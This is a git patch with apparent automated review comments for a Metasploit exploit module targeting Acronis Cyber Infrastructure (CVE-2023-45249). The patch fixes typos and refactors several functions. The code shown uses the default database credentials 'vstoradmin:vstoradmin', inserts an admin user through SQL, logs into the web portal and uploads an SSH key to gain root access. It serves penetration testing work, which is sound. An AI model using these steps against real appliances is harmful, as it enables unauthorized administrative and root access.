From d7fa23f30fc997b97dbd83ef39af5fd5cf0c2f63 Mon Sep 17 00:00:00 2001
From: "H00die.Gr3y" <38109035+h00die-gr3y@users.noreply.github.com>
Date: Tue, 17 Sep 2024 19:00:48 +0200
Subject: [PATCH] Apply suggestions from code review
Co-authored-by: bcoles
Co-authored-by: Julien Voisin
---
 .../acronis_cyber_infra_cve_2023_45249.md | 2 +-
 .../acronis_cyber_infra_cve_2023_45249.rb | 45 ++++++++++---------
 2 files changed, 25 insertions(+), 22 deletions(-)
diff --git a/documentation/modules/exploit/linux/http/acronis_cyber_infra_cve_2023_45249.md b/documentation/modules/exploit/linux/http/acronis_cyber_infra_cve_2023_45249.md
index 42958e31ec..c6fea94f1d 100644
--- a/documentation/modules/exploit/linux/http/acronis_cyber_infra_cve_2023_45249.md
+++ b/documentation/modules/exploit/linux/http/acronis_cyber_infra_cve_2023_45249.md
@@ -118,7 +118,7 @@ Description:
 cloud-native applications in production environments. This module exploits a default password vulnerability in ACI which allow an attacker to access the ACI PostgreSQL database and gain administrative access to the ACI Web Portal.
- This opens the door for the attacker to upload ssh keys that enables root acces
+ This opens the door for the attacker to upload SSH keys that enables root access
 to the appliance/server. This attack can be remotely executed over the WAN as long as the PostgreSQL and SSH services are exposed to the outside world. ACI versions 5.0 before build 5.0.1-61, 5.1 before build 5.1.1-71, 5.2 before build 5.2.1-69,
diff --git a/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb b/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb
index 0b9c851c4b..147d6e70c7 100644
--- a/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb
+++ b/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
 cloud-native applications in production environments. This module exploits a default password vulnerability in ACI which allow an attacker to access the ACI PostgreSQL database and gain administrative access to the ACI Web Portal.
- This opens the door for the attacker to upload ssh keys that enables root acces
+ This opens the door for the attacker to upload SSH keys that enables root access
 to the appliance/server. This attack can be remotely executed over the WAN as long as the PostgreSQL and SSH services are exposed to the outside world. ACI versions 5.0 before build 5.0.1-61, 5.1 before build 5.1.1-71, 5.2 before build 5.2.1-69,
@@ -121,8 +121,9 @@ class MetasploitModule < Msf::Exploit::Remote
 end
 end
- def add_admin_user(username, userid, password)
 # add an admin user to the Acronis PostgreSQL DB (keystone) using default credentials (vstoradmin:vstoradmin)
+ def add_admin_user(username, userid, password)
+ vprint_status("Creating admin user #{username} with userid #{userid}")
 # add new admin user to the user table
@@ -154,7 +155,7 @@ class MetasploitModule < Msf::Exploit::Remote
 vprint_status("Assigning the admin roles: #{id_project_role} and #{id_admin_role}")
 return false unless run_query("insert into \"assignment\" values('UserProject',\'#{userid}\',\'#{id_project_role}\',\'#{id_admin_role}\','F')")
- vprint_status("Succesfully created admin user #{username} with password #{password} to access the Acronis Admin Portal.")
+ vprint_status("Successfully created admin user #{username} with password #{password} to access the Acronis Admin Portal.")
 true
 end
@@ -180,8 +181,8 @@ class MetasploitModule < Msf::Exploit::Remote
 return true
 end
+ # Login at the Acronis Cyber Infrastructure web portal
 def aci_login(name, pwd)
- # Login at the Acronis Cyber Infrastructure web portal
 post_data = {
 username: name.to_s,
 password: pwd.to_s
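Review bot: The new line still carries a number-agreement slip: `upload SSH keys that enables root access` should read `upload SSH keys that enable root access`, and the context line just above it, `in ACI which allow an attacker`, should read `which allows an attacker`. The same sentence appears in the documentation hunk for acronis_cyber_infra_cve_2023_45249.md earlier in this patch, so both copies should be corrected together. This text appears to be part of the module's description string, which starts and ends outside the hunk.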
@@ -196,13 +197,11 @@ class MetasploitModule < Msf::Exploit::Remote
 'uri' => normalize_uri(target_uri.path, 'api', 'v2', 'login'),
 'data' => post_data.to_s
 })
- return true if res&.code == 200
-
- false
+ return res&.code == 200
 end
+ # Upload the SSH public key at the Acronis Cyber Infrastructure web portal
 def upload_sshkey(sshkey)
- # Upload the SSH public key at the Acronis Cyber Infrastructure web portal
 post_data = {
 key: sshkey.to_s,
 event:
@@ -236,9 +235,8 @@ class MetasploitModule < Msf::Exploit::Remote
 @timeout = true
 end
+ # Return ACI version-release or nil if not found
 def get_aci_version
- # Return ACI version-release or nil if not found
- version_release = nil
 res = send_request_cgi({
 'method' => 'GET',
 'ctype' => 'application/json',
@@ -247,16 +245,21 @@ class MetasploitModule < Msf::Exploit::Remote
 },
 'uri' => normalize_uri(target_uri.path, 'api', 'v2', 'about')
 })
- if res&.code == 200 && res.body.include?('storage-release')
- # parse json response and get the version
- res_json = res.get_json_document
- unless res_json.blank?
- version = res_json['storage-release']['version']
- release = res_json['storage-release']['release']
- version_release = Rex::Version.new("#{version}-#{release}".gsub(/[[:space:]]/, '')) unless version.nil? || release.nil?
- end
- return version_release
- end
+
+ return unless res&.code == 200
+ return unless res.body.include?('storage-release')
+
+ # parse json response and get the version
+ res_json = res.get_json_document
+ return if res_json.blank?
+
+ version = res_json['storage-release']['version']
+ return if version.nil?
+
+ release = res_json['storage-release']['release']
+ return if release.nil?
+
+ Rex::Version.new("#{version}-#{release}".gsub(/[[:space:]]/, ''))
 end
 def check
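Review bot: The `return` in the added line `return res&.code == 200` is redundant: it is the last expression of aci_login, so `res&.code == 200` on its own yields the same boolean, and the explicit keyword reads as a leftover from the two-branch form it replaces. The rewritten tail of get_aci_version in the @@ -247 hunk already follows the implicit-return style on its final `Rex::Version.new(...)` line, so dropping the keyword here keeps the two methods consistent. aci_login's body begins outside the hunk.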
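Review bot: `res_json['storage-release']['version']` assumes the value under `storage-release` is a Hash, but the guards above it only check that the body contains that substring and that the parsed document is not blank, so an unexpected shape in the server's response (a String, an Array or null under that key) raises instead of returning nil, which breaks the "or nil if not found" contract the new comment states and would abort `check`. Bind the sub-document once and type-check it: `info = res_json['storage-release']` / `return unless info.is_a?(Hash)` and then read `version` and `release` from `info`. Separately, `Rex::Version.new` appears to follow Gem::Version semantics and raises ArgumentError on a malformed version string, so a non-numeric `version` or `release` value would also escape the method; a `rescue ArgumentError` returning nil around the constructor would preserve the contract. get_aci_version starts in the preceding hunk, and `check`, whose `def` is the hunk's last line, continues outside it.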
@@ -293,7 +296,7 @@ class MetasploitModule < Msf::Exploit::Remote
 # create SSH key pair
 print_status('Creating SSH private and public key.')
- k = SSHKey.generate(type: 'RSA', bits: 2048)
+ k = SSHKey.generate
 vprint_status(k.private_key)
 vprint_status("#{k.ssh_public_key} root")